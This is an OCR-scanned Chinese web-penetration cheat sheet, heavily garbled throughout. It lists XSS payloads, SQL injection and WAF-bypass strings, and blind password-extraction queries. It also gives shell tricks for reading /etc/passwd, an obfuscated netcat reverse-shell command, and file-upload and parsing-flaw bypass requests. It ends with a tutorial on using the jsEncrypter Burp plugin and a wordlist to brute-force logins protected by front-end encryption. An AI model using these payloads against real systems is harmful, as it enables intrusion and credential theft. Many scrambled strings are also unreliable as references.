?id=%"; eval(unescape( location) )//#%0Aalert(0) 
?id=<script<{alert(1)}/></script> 

?id=<img src=x:alert(alt) onerror=eval(src) alt=0> 
7id=%3cscript%3ealert(1)%3c%2Fscript%3c 


?id=<a href="javas&#99; ript&#35;alert(1);"> 





71d=%2530%2573%2563%25 7 29625699625 7 09625 7 49625 3696256196256 9625659625 7 2%25 7 4962 52 8962! 
?id=<object+data="data: text/html; base64, PHNjcmlwdD5hbGVydCgxKTwvc2NyaXBOPgzz 


?id-1234&"»«script»alert(1)«/script»-1234 # 参数 名 


SQL 


简单 判别 诸如 点 以 及 数据 库 类 型 : 

| 数据库 类 型 | 连接 符 | 注释 符号 | 其 他 特殊 方式 | 唯一 的 默认 表 变量 和 函数 
站 | [eec [rccte paea 

| MSSQL | %2B (URL 加 号 编码 ) | -- | 待 补充 | @@PACK_RECEIVED 

| MYSQL | %20 (URL 空 格 编码 ) | # / -- | 待 补充 | CONNECTION_ID() 
| Oracle | %7C (URL 坚 线 编码 ) | -- | 待 补充 | BITAND(1,1) 
|PGsql | %7C (URL 坚 线 编码 ) | -- |and 1::int=1| getpgusername() 
| Access | %26 (URL 与 号 编码 ) | N/A | 待 补充 | msysobjects 

为 避免 被 wa 拦截 以 及 封禁 IP, 注 入 建议 不 首先 使 用 and 以 及 or 语句 。 

可 用 如 下 方式 替换 : 
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GME, MEL RHI 
3 Ee rd 
i. La! | | 'rd 


y-wo' 'rd 
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?id=ord('a')=97 

?id-123-AND-*1-1 

21d=123+&&+1=1 

?id='=' 

?id=123+AND+md5('a')!= md5('A') 
?id=123+and+len(@@version)>1 

gi Eu TH ps dt 

?id-123'«like*'123 

?id-123'-«not*like-*'1234 

?id='aaa'<>'bbb' 

?id-123/*! union all select version() */-- 
2i1d2123/*10r*/1-1; 
?id-(1)union(((((((select(1),hex(hash)from(users)))))))) 
?id=1+union+(select'1',concat(login, hash) from+users) 
Pid=1+%55nion(%53elect 1,2,3)-- - 


?id=1/* !000000union*/select%0d%0a/*asdas/asd asasd*/version() 





?id-1 union(select%@aall{x users}from{x ddd}) 


Mysql 常 用 函数 


字符 串 处 理 : 
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B >. 
EUser' OR mid(password,1,1)-'*' 


-user' OR mid(password, 1,1)-0x2a 

L ser' OR mid(password,1,1)-unhex('2a') 

y=user ' OR mid(password,1,1) regexp '[*]' 

y=user' OR mid(password,1,1) like '*' 

y-user ' OR mid(password,1,1) rlike '[*]' 

y=user OR ord(mid(password, 1,1))=42 

y-user' OR ascii(mid(password, 1,1))-42 

y-user ' OR find in set('2a',hex(mid(password,1,1)))-1 
ser' OR position(0Ox2a in password)=1 


j-user ' OR locate(0x2a,password)-1 


[user ' OR substring((select 'password'),1,1) - 0x70 
y-user ' OR substr((select 'password'),1,1) - 0x70 


Suser' OR mid((select 'password'),1,1) = 0x70 


"User' OR strcmp(left('password',1), 0x69) = 1 
-user' OR strcmp(left('password',1), 0x70) = 0 
"user' OR strcmp(left('password',1), 0x71) - -1 





($315) DE (RD 绕 过 
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$ echo orleven 


orleven 


$ echo 'o'r'l'e'v'e'n' 


orleven 


$ /b i n/e at /ett'"c/p ars Ss wid: 
root:x:0:0:root:/root:/bin/bash 
daemon:x:1:1:daemon: /usr/sbin:/usr/sbin/nologin 


bin:x:2:2:bin:/bin:/usr/sbin/nologin 


$ /b\i\n/c\at /et'c'/pa's'swd 
root:x:0:0:root:/root:/bin/bash 
daemon: x:1:1:daemon:/usr/sbin: /usr/sbin/nologin 


bin:x:2:2:bin:/bin: /usr/sbin/nologin 


Qu CE aA ^s NNI 
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?2/c?t /etc/??ss?d 
:x 10:0: root : /root : /bàn/bash 
n:x:1:1:daemon: /usr/sbin:/usr/sbin/nologin 


k:2:2:bin:/bin:/usr/sbin/nologin 


)22/n? -e /???/b??h 2130706433 1337 # /bin/nc -e /bin/bash 127.0.0.1 1337 
不 存在 的 符号 
1 t=] 


$u/etc$u/passwd$u 
1X10:0:root : /root :/bin/bash 
0n:x:1:1:daemon: /usr/sbin:/usr/sbin/nologin 


X:2:2:bin:/bin:/usr/sbin/nologin 


SAT 


t /etc/passwd; 1s 
HX :110:115:MySQL Server,,,:/nonexistent:/bin/false 


E go gobuster gopath soft sqlmap.log tool 
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3. 如 果 有 改名 功能 ， 可 先 上 传 正常 文件 ， 再 改名 . 
4. %00 


5. Qo(hex) 








6. 长 文件 名 (windows 258byte | linux 4096byte) ， 可 使 用 非 字 母 数 字 ， 比 如 中 
度 的 拉 长 。 


7. 重 命名 


WAR 


Php/php3/php/php5/php6/pht/phpt/phtml 
asp/cer/asa/cdx/aspx/ashx/ascx/asax 


jsp/jspx/jspf 


解析 漏洞 


服务 器 特性 : 
1. 会 将 Request 中 的 不 能 编码 部 分 的 % 去 掉 
2. Request 中 如 果 有 unicode 部 分 会 将 其 进行 解码 


IIS 


11S6.0 两 个 解析 缺陷 : 目录 名 包含 .asp、.asa、.cer 的 话 ， 则 该 目录 下 的 所 有 文件 都 将 按照 asp 
例如 : 


/abc.asp/1.jpg 会 当做 /abc.asp 进行 解析 。 


/abc.php;1.jpg 会 当做 /abc.php 进行 解析 。 


Apache1.X 2.X 解 析 漏洞 


Apache 在 以 上 版 本 中 ， 解 析 文件 名 的 方式 是 从 后 向 前 识别 扩展 名 ， 直 到 遇见 Apache 可 识别 的 扩展 
名 为 止 。 


Nginx 


以 下 Nginx 容 器 的 版 本 下 ， 上 传 一 个 在 waf 白 名 单 之 内 扩展 名 的 文件 shelljpg， 然 后 以 shelljpg.php 进 
行 请 求 。 
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x 0.7 <= 0.7.65 


x 0.8 <= 0.8.37 


jnx 容 器 的 版 本 下 ， 上 传 一 个 在 waf 白 名 单 之 内 扩展 名 的 文件 shelljpg， 然 后 以 
0C 9620. php3 {Tia KX. x 


meo.6o.41 - 1.5.6: 


CGI 解析 漏洞 


[7.5 和 Nginx < 0.8.3 以 上 的 容器 版 本 中 默认 php 配 置 文件 cgi.fix_pathinfo=1 时 ， 上 传 一 个 存 
名 单 的 扩展 名 文件 shell.jpg， 在 请 求 时 以 shell.jpg/shell.php 请 求 ， 会 将 shell.jpg 以 php 来 解 


ADS 特 性; ADS 是 NTFS 磁 盘 格式 的 一 个 特性 ， 用 于 NTFS 交 换 数据 流 。 在 上 传 文件 时 ， 如 果 
清 求 正文 的 flename 匹 配 不 当 的 话 可 能 会 导致 绕 过 。 
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上 传 的 文件 名 ”服务 器 表面 现象 
Test.php:a.jpg ^t px Test.php 
Test.php::$DATA 生成 test.php 
Test.php::$INDEX_ALLOCA ”生成 test.php 文 件 夹 
TION 

Test.php::$DATA.jpg 生成 0.jpg 
Test.php::$DATA\aaa.jpg 生成 aaa.jpg 


< 变 *，windows findfirstfile 利 用 


原理 : Windows 下， 在 搜索 文件 的 时 候 使 用 了 FindFirstFile 这 





协议 解析 不 一 致 , 绕 过 waf (注入 跨 站 也 可 尝试 ) 


因为 这 种 不 仅仅 存在 于 上 传 之 处 ， 注 入 跨 站 也 可 尝试 。 


垃圾 数据 


---------- WebKitFormBoundaryFADasdasdasDdasd 


Content-Disposition: form-data; name="file"; filename-'abc.php';aaaaaaaaaaaaaae 


Content-Type: application/octet-stream; 


«?php phpinfo(); ?» 


---------- WebKitFormBoundaryFADasdasdasDdasd 


文件 类 型 绕 过 /Header 头 类 型 
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-个 winapi 国 数 ， 该 函数 到 


”( 双 引号 ) 被 琵 换 成 一 个 字符 。 B 


生成 的 文件 内 容 


m 






<?php phpinfo();? 


<?php phpinfo();?» 


<?php phpinfo();?> 





个 文件 夹 (包含 子 文件 出 


型 绕 过 /Header 头 的 Content-Type， 多 次 党 试 : 
~ 


















, 


ent -Type: application/x-www-form-urlencoded; 
lent-Type: multipart/form-data; 


lent -Type : application/octet-stream; 


解析 兼容 性 


ename 兼 容 性 ， 多 次 修改 尝试 Content-Disposition 


tent-Disposition: form-data; name="file"; filename=bc.php 
tent-Disposition: form-data; name="file"; filename="abc.php 


tent-Disposition: form-data; name-"file"; filename='abc.php' 


frr ctt 


at 协议 中 ， 一 个 POST 请 求 可 以 同时 上 传 多 个 文件 。 如 图 ， 许 多 WAF 只 检查 第 一 个 上 传 广 
有 检查 上 传 的 所 有 文件 ， 而 实际 后 端 容器 会 解析 所 有 上 传 的 文件 名 ， 攻 击 者 只 需 把 paylaod 放 


E---- WebKitFormBoundaryFADasdasdasDdasd 
lent -Dispositiona: form-data; name="file"; filename='abc.jpg' 
tent -Disposition: form-data; name="file"; filename='abc.php' 


ent-Type: application/octet-stream; 


MP phpinfo(); ?> 


E --- WebKitFormBoundaryFADasdasdasDdasd 
Content-Disposition 文 件 名 覆盖 (Win2k8 + IIS7.0 + PHP) 
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La kd 
M WebKitFormBoundaryFADasdasdasDdasd 


Content-Disposition: form-data; name-"file"; filename='abc.php' 


---------- WebKitFormBoundaryFADasdasdasDdasd 
Content-Disposition: form-data; name="file"; filename-'abc.jpg' 


Content-Type: application/octet-stream; 


«?php phpinfo(); ?» 


---------- WebKit FormBoundar yFADasdasdasDdasd 


更 换 filename 位 置 (iis 6) 


T WebKitFormBoundaryFADasdasdasDdasd 





Content-Disposition: form-data; name="file"; 
Content-Type: application/octet-stream; 


filename-'abc.asp' 


«?php phpinfo(); ?» 


---------- WebKitFormBoundaryFADasdasdasDdasd 


删除 content-type 字 段 
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_-- -WebKitFormBoundaryFADasdasdasDdasd 


t-Disposition: form-data; name-"file"; filename='aaaa.jpg abc.php' 


phpinfo(); ?» 


_.---WebKitFormBoundaryFADasdasdasDdasd 
ontent-dispositionS% 


- -- - -WebKitFormBoundaryFADasdasdasDdasd 
int -Disposition:form-data; name-"file"; filename-'aaaa.jpg abc.php' 


int-Type: application/octet-stream; 


p phpinfo(); ?» 


- =---- WebKitFormBoundaryFADasdasdasDdasd 
| Content-Disposition 字段 值 的 大 小 写 


p----- WebKitFormBoundaryFADasdasdasDdasd 
tent-Disposition: form-data; nAme="file"; filename-'aaaa.jpg abc.php' 


Itent-Type: application/octet-stream; 


hp phpinfo(); ?> 


E---- WebKitFormBoundaryFADasdasdasDdasd 


indary 空 格 (Win2k3 + IIS6.0 + ASP) 
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^ 


d" » 
Content-Type: multipart/form-data; boundary- ---------- WebKitFormBounda 


Content-Length: 191 


---------- WebKitFormBoundar yFADasdasdasDdasd 


Content-Disposition: form-data; namez"img"; filename="img.gif" 


GIF89a 
---------- WebKitFormBoundaryFADasdasdasDdasd 


Content-Disposition: form-data; name="id" 


1’ union select null,null,flag,null from flag limit 1 offset 1-- - 


---------- WebKitFormBoundaryFADasdasdasDdasd 


boundary 边 界 不 一 致 (Win2k3 + IIS6.0 + ASP) 
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v * Li 
ent-Type: multipart/form-data; boundary= ---------- WebKitFormBoundarydasdasc 


-ent - Length Cae Kea 


- oe WebKitFormBoundarsdai1231sdsdasdasd 


tent-Disposition: form-data; name="img"; filename="img.gif" 


E... WebKitFormBoundarydasdasda12312312 


tent-Disposition: form-data; name="id" 


tapachellSZ boundary: 


Wifrmultipart data 的 时 候 有 自己 的 特性 ， 对 于 boundary 的 识别 ， 只 取 了 逗号 前 面 的 内 容 ， 例 
设置 的 boundary 为 --aaaa, 123456 ，php 解 析 的 时 候 只 识别 了 - -aaaa ,后 面 的 内 容 均 没有 
然而 其 他 的 如 WAF 在 做 解析 的 时 候 ， 有 可 能 获取 的 是 整个 字符 串 ， 此 时 可 能 就 会 出 现 
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e » 








Content-Disposition: form-data; name="img"; filename="img.gif" 


GIF89a 


Content-Disposition: form-data; name="id" 


1' union select null,null,flag,null from flag limit 1 offset 1-- - 


文件 名 覆盖 


在 一 个 Content-Disposition 中 ， 存 在 多 个 flename ， 协 议 解析 应 该 使 用 最 后 的 flename 值 作为 文 
名 。 如 果 WAF 解 析 到 filename-"p3.txt" 认为 解析 到 文件 名 ， 结 束 解 析 ， 将 导致 被 绕 过 。 AAR 
端 容器 解析 到 的 文件 名 是 t3.jsp o 


Content-Disposition: form-data;name="myfile"; filename-"p3.txt";filename-"t3.jSl 


文件 名 回 车 


Content-Disposition: form-data; name="img"; filename="img.ph 


p" 


遗漏 文件 名 
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导 致 WAF 被 绕 过 | * 


tent -Disposition : form-data;name-"myfile";; filename-"t3.jsp" 


value=payload 


Jovalue-payload 
ost 


d-111111111111111111111 (很 长 很 长 ) and 1-1 


id=1111111 union %23xxxxxx (很 长 很 长 ) xxxx%9d select 等 


P://example.com/file%00.txt 


p HTTP 参 数 污 染 /拼接 (以 Mysq 为 例 ) 
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s Sl'name-"myfile";;" B3, 认为 没有 解析 到 filename。 而 后 端 容器 继续 解析 到 的 文件 名 是 


?id=123+uniontselect+1, 2, 3+from+table 


?id=123+union+select+1&id=2, 3+from+table 


?id=123+uniontselect/*&id=*/user&id=pass/*&id=*/from/*&id=*/users id=se 


这 是 中 间 件 与 参数 拼接 的 关系 图 : 







ASP.NET/IIS All occurrences of the specific parameter 





















ASP/IIS All occurrences of the specific parameter 
PHP/Apache Last occurrence 
1 
PHP/Zeus Last occurrence pari=val2 











ISP, Serviet/Apache Tomcat First occurrence 











parl-vali 





JSP,Servylet/Oracle Application Server 10g First occurrence 
JSP,Servlet/Jetty 


IBM Lotus Domino 





First occurrence 


rren 
Last occurrence 













parizvall 





pari=val2 









IBM HTTP Server First occurrence 


mod_perl, libapreq2/Apache 


Perl CGI/Apache 
mod perl,lib???/Apache 











First occurrence 





First occurrence 


ecomes an arra 
Bec sa y 





parizvali 













parl=val1 
pari-va 








mod wsqgi (Python)/Apache 








parl=vall 














First occurrence 
mi 


Python/Zope Becomes an array 


[vall 'val2'] 








IceWarp Last occurrence 








pari-val2 











All occurrences of the specific parameter 


AXIS 2400 


Linksys Wireless-G PTZ Internet Camera Last accurrence 








parl=val1,val2 





pari=val2 















Ricoh Aficio 1022 Printer First occurrence 


= 


parizva 








webcamxP PRO First occurrence 


DBMan All occurrences of the specific parameter 












pari-val 


parl=vall~~val2 





HPF HTTP 分 割 注 (以 Mysql 为 例 ) 


# select * from tablei.markt where brand=123 union/* and prodid=*/select userné 


?brandid=123+union/*&prodid=*/select+user, pass/*&price=*/from users-- 


路 径 系 列 
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x 
- 


By LL | g M LL LL S111 //blah/blah/blah/../../../vuln.php 







In. php?value-PAYLOAD 
à lol/vuln.php?value=PAYLOAD 
n.php/lolol?value=PAYLOAD 


in. php; 101-101?value-PAYLOAD 


le - %27 
L Encode - 92527 


byte) - %co%a7 


- &#39 


icode 的 解析 ， 如 :payload 为 sxuee6cxuggg6ect ,解析 出 来 后 则 是 select 
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另类 %u 特 性 : unicode 在 is 解析 之 后 会 被 转换 成 multibyte， 但 是 转换 的 过 程 中 可 能 出 现 ; 多 个 
widechar 可 能 会 转换 为 同一 个 字符 。 


如 : select 中 的 e 对 应 的 unicode 为 %u0065， 但 是 %u00f0 同 样 会 被 转换 成 为 e soouO0f0lect 
类 似 还 有 : 
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%uff08 
96c 09628 
%CO%AB 
%e0%80%a8 
右 括号 ) : 
9600029 
%uff09 
96c 09629 
96c 096a 9 


96e 096809689 


% 特 性 


iistasp asp+iis 环 境 下 会 忽略 掉 百 分 号 ， 如 : payload 为 sele%ct ,解析 出 来 后 则 是 select 


asplasp.net 解 析 请 求 


asp/asp.net 在 解析 请 求 的 时 候 ， 人 允许 Content-Type: application/x-www-form-urlencoded 的 数据 
Fixtselect%201%20from%20user 


其 他 






?id=%3cscript%3ealert(1)%3c%2fscript%3c 
?id=<a href="javas&#99;ript&#35;alert(1);"> 
2id=%2530%2573%2563%25 7 2%2569%25 70%2574%2530%2561%2560%2565%25 7 236257 442528962531. 


2id=%A2%BE%BCScript%BEalert(1)%BC/script%BE 


Pid=. .%cO%af../bin/1s%20-al| 


Pid=. ,%fc%86%89%86%86%af . . /bin/1s?620-al| # ?id-../../bin/ls*20-al| 
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: E i 


小 写 变化 ( 非 WAF 仅 过 滤 绕 过 ) — 1 


i =<sCripT>AleRt (123)</scRIpt> 


j-123 uniOn SeLEcT BaNneR FroM v$vERsIon WhERe ROwNUm-1 


( 非 WAF, 仅 过 滤 绕 过 ) 


J=itun/**/ion+sel/**/ect+1, 2,3-- 


中 间 分 析 设 备 


' /test HTTP/1.1 > GET test.randkey.yourloggingdomain.com 


设备 拼接 后 : host.test.randkey.yourloggingdomain.com 
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登陆 口 js 前 端 加 密 绕 过 
概述 








很 多 朋友 在 实战 搞 站 或 者 挖 src 时 候 ， 遇 到 web 登 录 口 ， 像 抓 包 看 看 的 时 候 ， 你 会 发 现 现 在 的 
账号 密码 很 多 都 是 经 过 js 前 端 如 密 之 后 再 发 送 ， 如 下 图 ， 我 手机 号 输入 的 是 1388888888， 但 
到 post 的 user 人 参数 是 经 过 js 加 密 的 ， 这 样 我 们 想 爆破 就 不 能 用 原来 的 方法 了 。 


Forward Drop Intercept i$ on Acton 








我 在 网 上 搜 了 下 资料 ， 大 概 能 分 为 以 下 4 种 方法 。 参 考 : 
常用 几 种 方法 


我 将 几 种 方法 口语 化 简 述 下 : 


1. 既然 是 前 端 s 加 密 ， 代 码 我 们 都 能 看 得 到 ， 我 们 搭 个 服务 器 ， 每 次 发 包 前 ， 把 要 发 送 的 加 密 
数 用 服务 器 加 密 一 遍 ， 我 们 再 把 加 密 后 的 参数 发 送 过 去 ， 这 样 相当 于 本 地 还 原 了 加 密 过 程 。 


1. 利用 selenium webdriver 等 完全 模拟 人 工 输入 ， 字 典 也 可 以 自 定义 ， 不 过 需要 自己 写 脚 本 而 
已 ， 这 种 方法 比较 万 能 。 


. 这 种 方法 适合 有 js 功底 的 同学 ， 首 先 把 他 的 js 加 密 过 程 跟 方法 看 懂 ， 然 后 本 地 简化 或 者 用 其 他 
言 模拟 他 的 加 密 过 程 ， 再 自己 写 脚 本 去 跑 ， 或 者 生成 加 密 后 的 字典 直接 burp 去 跑 即 可 。 


1. 前 人 栽 树 ， 后 人 乘凉 ，cOny1 老 哥 为 了 方便 后 辈 ， 写 了 一 款 burp 插 件 ， 
， 名 为 jsEncrypter， 简 单 来 说 就 是 把 L，3 点 结合 了 一 下 ; 


= 


用 插件 方便 地 哆 起 来。 


jsEncrypter 安 装 与 本 地 测试 


这 里 重点 介绍 第 四 种 方法 。 


1. 首先 得 安装 maven，mac 下 直接 brew install maven 
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度 也 一 堆 安装 方法 














4 百度 maven 安 装 


网 页 


1. 先 到 官网 http;/imaven.apache.org/downioad.cgi 下 载 最 新 版 本 ， 下 载 完成 后 ， 
BESTA 

2. 系统 环境 变量 里 ， 添 加 MAVEN_HOME{( 或 M2 HOME)， 其 值 为 maven 的 安装 
目录 : E'apache-maven-3.5.0 

3. PATH 环 境 变 量 最 后 附加 上 ";%MAVEN HOME bin" 


A: mvn -version 输出 安装 版 本 就 ok 了 








4.win+R 输 入 cmd， 然 后 输 ， 


5. eclipsei (t 2i: Help >>Eclipse Marketplace 


maven T RRE 










Binary tar.gz archive apache-maven-3.6.1-bin.tar.gz apache-maven-3.6.1-bin.tar.gz.sha512 












apache-maven-3.6. 1-bin.tar.gz.asc Binary zip archive ap 
maven 的 安装 与 基本 使 用 - KylelnJava - 博客 园 


WED 的 上 时候, 你 用 - 


后 Maven 可 以 应 用 模 切 的 逻辑 ,这 些 逮 辑 来 自 一 组 } 
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ia jsEncrypter-master 


Hv g 


crypter-master 


名 称 


da doc 
5 pom.xml 
BB README.md 
[ script 
LEE 
ÈB target | 
E 











test 文 件 夹 是 本 地 测试 demo 眼 常见 加 密 算 法 的 js 牌 本 ，script 脚 本 就 是 自 带 的 phantomijs 服 
文件 ， 我 们 每 次 用 都 得 稍微 改 下 才 可 以 用 (这 里 注意 啦 ， 直 接 


1. 然后 把 target 文 件 夹 里 面 的 jar 插 件 添加 到 burp 里 面 


Burp imrader Repeater Window Heip 


Target 





recat Sind 


| Spider Skanner | intruder Repeater Sequencer Decode: 





Serer EE 








| Extensions BApp Store | APis | Options 


be 


Extensions iet you customize Burp'* behavior using your own or third-party code 


D» loaded Type Name 
x Java jsEncrypter 0.3 
Remove v java ssEnceypter 0.3 
Up 
Down 
Ld 





J Extension loaded 


Extension type 
Name jsincrypter 0.3 


Extension file ( jar) 
kem 
Extension type 
Filename 
Method 
Context menu providers 
Suite tabs Save to file 


intruder payload processors 
® Show in Ul 


java x 


Output to system console 


Output to system console 


Save to fle 


©) Show in Ul 


加 完 之 后 如 下 图 就 是 成 功 添加 了 


Burp intruder Repeater Window Heip 


| Target | xy | Spider ] Scanner I Intruder | Repeater 


j Sequencer j! 


AUS 


运作 


肯定 fail 的 ) 。 





Select file 


Select file 


Please enter the details of the extension, and how you would like to handie standard output and error 


Cancel 


| Comparer | Extender | Project options | User options 








Host. 127.0.0.1 Port 1664 


123456 
3123456 
123456a 
5201314 
111111 
woainil 314 
49123456 
123123 
000000 
1qaz2wsx 
1q2w3ed4r 
qwel23 
7758521 
123qwe 
al23123 
123456aa 
woainis 20 
woaini 
100200 
1314520 


Timeout 
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5000 


Connect 


IsConnect: unknown 





Test 












i E. 


1 ABD RARE AAM A GEB FUR-phantomjs, phantomJS FH: 
http.//P' ， 下 载 后 把 phomtomjs 添 加 到 环境 变量 即 可 ， 成 功 安装 完 
运行 如 下 图 


iig 


yuwenledeMBP:script lok$ phantomjs 
ohantomjs> 





疆 基 本 准备 工作 完成 ， 下 面 我 们 用 本 地 demo 来 测试 下 。 


”本 地 例子 


续 首 先 我 们 得 把 jsencryptertest/webapp 整 个 文件 夹 复 制 到 phpstudy 或 者 mamp 或 者 其 他 你 习惯 用 
的 简便 服务 器 搭建 起 来 


iii test 
~ sHos z- &- 5 a 


"c 
Tay 
ts 


E zn 
ES Mi TestSeript 
E di webapp 







| 
d 
A L 353518)127.0.0.1/webapp 
E- E. C a ®© 127.0.0.1/webapp/ 

最 常 访问 ”全 localhost F7 常用 网 址 @ Google % 45.32.152.171 国 phpinfo.me 
encrypt: RSA 
Username: admin 


Passwo R 


submit 



















国 我 们 可 以 看 到 ，script 里 面 只 有 两 个 js 脚本 
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[ script 
LÀ == fur B LS LE Lr QBs 
名 称 修改 日 期 


= nodejs_ serverjs 20195558 30H L'rF8:46 
> phantomjs. server.js 2019558 30H E^F8:46 


根据 你 所 用 的 js 加 密 算法 ， 改 一 下 phantomjs_serverjs， 再 另存 为 一 个 。 





encrypt: RSA 


username: base64 
md5 


password: shat 
sha256 
sha384 
sha512 


可 以 看 到 ，demo 提 供 了 7 种 加 密 给 我 们 选择 ， 这 里 我 们 就 用 rsa 加 密 为 例子 来 走 一 波 ~ (这 里 说 
严格 来 说 ，base64 加 密 不 是 一 种 加 密 ， 而 是 一 种 编码 ) | 


1. f12， 然 后 source 调试 器 里 面 的 源码 


ui 
N 
N 






pues ‘DO sss (Qmewus One Qs th me Ceu e RR d pear rack 
EE ts a Kate: weit jo typt 51 


|. vase een 


析 webapp 下 的 index 文 件 ， 我 们 可 以 看 到 这 里 有 一 个 switch 函 数 给 出 了 7 个 case， 我 们 选 的 
是 最 后 一 个 case 6， 这 里 new 了 一 个 JSEncrypt () 函数 ， 经 分 析 是 调用 了 JSEncryptjs 文 件 ， 
下 set 了 一 个 publickey， 我 们 在 index 文 件 再 搜索 下 publickey 














到 ，public_key 是 一 个 隐藏 标签 ，post 时 候 一 同 提交 ， 其 实 当中 过 程 我 们 并 不 用 了 解 太 多 ， 
逻辑 就 可 以 开始 改写 phantomjs_serverjs 文 件 


Tf 始 自 定义 server 文 件 ， 我 们 改写 红色 框框 里 面 的 内 容 就 好 
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phantomjs server.is 


var fs ~ require('fs'); 

var logfile *jsEncrypter.log'; 

var webserver © require('webserver'); 
server - webserver.create(); 


var host Br M MU 
var port "1664'; 


var wasSuccessful ~ phantom. injectJs('xxx.js'); 


| function js_encrypt(payload){ 
var newpay load; 


newpay Load; 


(wasSuccessful) f 
console.log("(*] load js successful"); 
console. log("{!] *_*"); 
console. log("[*] jsEncrypterJS start!"); 
console.log("[*] address: http://"*host.":;":port); 
1 


console.log('([x] load js fail!'); 


按照 他 的 逻辑 ， 改 完 之 后 如 下 图 : 


a Post 
var port 


var wesSuccesstul phantom 


Lo encrypt 


Newpaty Load 
D 


iwaiSuccess ful) 


console. logi’ fn} oed js taiii; 


public_key 就 是 刚才 隐藏 标签 那 一 串 ， 其 实 自 定义 完 的 js 文件 ，test 文 件 夹 下 作者 已 经 帮 你 写 好 了 
我 这 里 大 概 告诉 你 流程 。 


1. 运行 server 文 件 : 


phantomjs jsEncrypter_rsa.js 


yuwenledeMBP:script lok$ phantomjs jsEncrypter_rsa.js 
[x] load js successful 

[ 1] AA 

[x] jsEncrypterJS start! 

[+] address: http://127.0.0.1:1664 











HRAJE, Ar successful, 显示 fail 的 话 证 明 哪里 有 错误 ， 根据 错误 进行 调试 就 好 。 
^ d * + 


后 burp 那 边 打开 jsencrypter 插 件 ， 默 认 地 址 跟 端 口 ， 点 击 connect 即 可 连接 ， 连 接 成 功 会 显示 
e， 然 后 点 击 test， 它 会 根据 你 的 算法 帮 你 在 右边 生成 密 文 ， 由 于 这 里 demo 密 码 是 admin， 
在 第 一 个 加 一 个 admin 


Pars 1604 Timeout $000 Connect IsConnect Test 


ObwXing mA] Yr)tginty APL GNF S RI? FZRyMLAD Cho I V6CWUp 127 mq? YPxH VjeMmazo T iow Mena AT gg feN /GAZ sFSh7 S RUUSA SuRwlibdspASS CEODR Fh 
WR SaoWp^qUwl « Pk 7 abl; 7mxGhkhSINJaC24oMsErze] P 24X T4aULOtZPYh Ay T C)MyenX yPDVELQa6 9yBxHPDDGwosFI2 ECOXV] B+ hidsud YSnmbz SFoMCESS € 
eIYpVRE; 1 WnenfefSgl i He SMOR /busqmipCbapyWwtyS bm zvZXndlosgAdIE viuwwZI SNB + fe Pb2vilb 2t? USC 3«OX VNmSvywC b Y TYwxRAYhrEvA/ TROVORT 
TEHMIHEKERE Me Pd WW vp RimOy)r CCOHQuNINS GHR + OwAnmHoz Ha AFwMshrwowE T Od nC 2X 4C7 py Zwaág wa 4DWI LK2 AKETPTUE T dzke Q7 ss OE Sg 
12 xbdw? « UGZ LLIT 2MUSWy9M4 S 513 ScBoZdtG YE PITIODeS LOYes2 Wa FOUSS MVS GI UZ SPH 05 BRIMI VZS « W;COhEdv5 IDCq9nunjL m NOO mabpl2 r (c 
OT wT en 2087KqXjsA7REdUQEWI HYSNI 1 ZMZ njHOxoUMOUKuBuHO LLjGNIYGeqiicKX It TT zpz + (4 KUMMNYGTENM /xnV2] + DBOr4IXYI YaebbiS Ya guta 
We gY L QaFMAhd)GaCaecYs qi H /Gmsge cu&nzepjilium? Qnk /AINLRDT Ind usb /RCMJaDOQa 1 Dbsq5 vk PretyE O4 cix NE mOZBH2 ooDfb YC 9 Dax X 2CFz 2h 8)pQ 
TSLOAYxdha IWAN 3FqNtHQwpbb;IMBRKEEVTVw + UKD T hB)diFrpkayTOXIu2 CeCM + GfjtUYivb | Td Con Y mceqiu6srs2 9 ink /kATHIRNDIN + VIC ABR lak Wheto 
EoPhi IPC ILIGA qDKRus /FgnfiLle skaiqWezwt 7 Qv? YipliOyDa]/LSxX GR VrOJS SOT V eSP 8k BPOIET + /SDNvaqyybosbH CX /digHausUAZSNDEruS OrhOR Yid Qd 
MI MMH ka KiwhwBO22 IASZKAPTEO PS p] 2 SSS k Los EwBY2 ud Nb VbcUgP LBLAAHPwlu69 i COquS OK; Voci Yiz VY ON WT MmcZwGuROPha A&OmDT r « 28/4 
TYXXORP LAPT eS ZZUhIGR 1 * XzD7 QWVEN « x LASGRYyGGZjAS OORT ADUWDIGSGhZoN;bRr2tYj Z5 6hCRSV /BFSRNrei S«CLv7 SDBpSnLIAWFLamoOa P Gn; fd atQZ 
BK Hep S Bad pM 2VI2idE LUS kA Npa YWOKYbx9kC9m «mS Qn2y7 XRqpheawDECh « 70 b2CpD Oc 'eHkmq + kKV Tdrk QRXVjbH Jumqq TuG The 5u9q Wed, 
OxhShifuOviswT ACL Ri /OtnpP9 LegHzmi «nil CK 904 Gsgkuc TH QMOCRAJAS Oex IS FHA qUK QT v4 XoNREX 212 W] B/S XQXOGWÜd SOC WOENE Hatt 
qvex SI Aa? uoi 2 TNIVO » + ERGE Shs Lur? a DARL q z8b xFuDMDfIS AZCe YMOqtW2 2d 4 2B6 0 kUpKtdpt fev /MnajOG6 mdQa Tor Z8kAFrsQubi /OAZw] /wPxHProg al 
Karde? Dlws + Ri&rOPn(piueuT SROILLRGTqwVabuZ9$SSyyVvFi o/ AK Q7 roop Muvr 2exCA4 CZ8On 7 K SqHNoOYOCKH * wx /oxoFYobNZIT 2paZieRsFOp« + v8 Za 
Vw jaG 4idNena? Wnod ysa2 ZXooz VE MApoDtd Ya haunl T NJT Lez NW LCwTSADo 3WotO /Ceskqummvi RcDcQop TT CSe pRO T7 9bmnPF 2 AWW» vf lor oN Gu 
XX Ef by SMe chOqisPAi e Sov X6 TrV Sk OG oU NKR ICE LYRA GX mHWXe xyS2 vq SW Had Qm cand Ged 99x "OrMAqxGZl LC veo? qliod IMKqC4 / /&kaD 1 
UWispRp?2RH156YpYekabCAIYE poll TAD LAD YGOOe YRY2tOol LkiHROE /zYrOuY 12 ]bhble T mámjKFdial Syr AK)DR SBoocweOv)vikq MZNeGOoGVk ul nHL lb. 
hiuT a Ysa YP SP MAS 62 + Ghworig BIME ne ? 1 1 906p Yv THIN + WhqyOQt NY mS pl AeR VSA ON Atanan EWI mHaoRG peCQVx T MQ&E p 1Cye Pn? w « t 2 Pg» 
Xali6 91V205URZIOLGS Wd / + V|TAIEKALEmkvfLZXDNNSq3P 7 msXUveNgK S zkZigyDhbvaiNDvl uih 9WmZza4 YoS RE Vp Sz S rLerGfácvs 2mp + 55y$ 28kglvi 








后 我 们 可 以 结合 burp 的 暴力 破解 模块 来 进行 爆破 ， 首 先 抓 包 , 然 后 丢 去 intruder 模 块 ， 把 密码 
